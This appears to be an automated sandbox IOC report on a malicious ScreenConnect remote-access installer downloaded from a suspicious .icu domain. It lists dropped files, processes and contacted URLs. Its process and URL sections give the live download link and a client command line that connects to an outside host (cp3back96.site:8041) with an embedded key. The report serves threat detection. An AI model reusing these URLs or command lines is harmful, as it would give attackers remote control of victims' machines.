IOC Report
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPq

loading gif

Files

File Path
Type
Category
Malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x28b44850, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\4ta5r3hc.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\app.config
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\web.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\C7EOHWRV.log
Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\Deployment\NNEWXDXK.2NA\YR49AVEQ.H9P.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\Downloads\Unconfirmed 974768.crdownload
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\Downloads\bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\Downloads\support.Client.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Windows\System32\user.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
Chrome Cache Entry: 128
PE32 executable (GUI) Intel 80386, for MS Windows
downloaded
There are 71 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
 malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
 malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
 malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
 malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup
 malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
malicious
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r="
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\SgrmBroker.exe
C:\Windows\system32\SgrmBroker.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Users\user\Downloads\support.Client.exe
"C:\Users\user\Downloads\support.Client.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 11 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=
malicious
https://cp9856.chelokipotl
unknown
 malicious
https://cp9856.chelokipotlester.icu
unknown
 malicious
https://dev.ditu.live.com/REST/v1/Routes/
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.x
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config
37.221.67.19
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.
unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking
unknown
http://www.fontbureau.com/designers
unknown
http://wl3.org/2000/0mldsig#sha1o
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.dll
37.221.67.19
http://www.sajatypeworks.com
unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
unknown
http://wk3.org/2000/0pldsig#sha1qs
unknown
http://www.founder.com.cn/cn/cThe
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.ex
unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/
unknown
http://www.galapagosdesign.com/DPlease
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session
37.221.67.19
http://www.urwpp.deDPlease
unknown
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
37.221.67.19
http://www.zhongyicts.com.cn
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.bingmapsportal.com
unknown
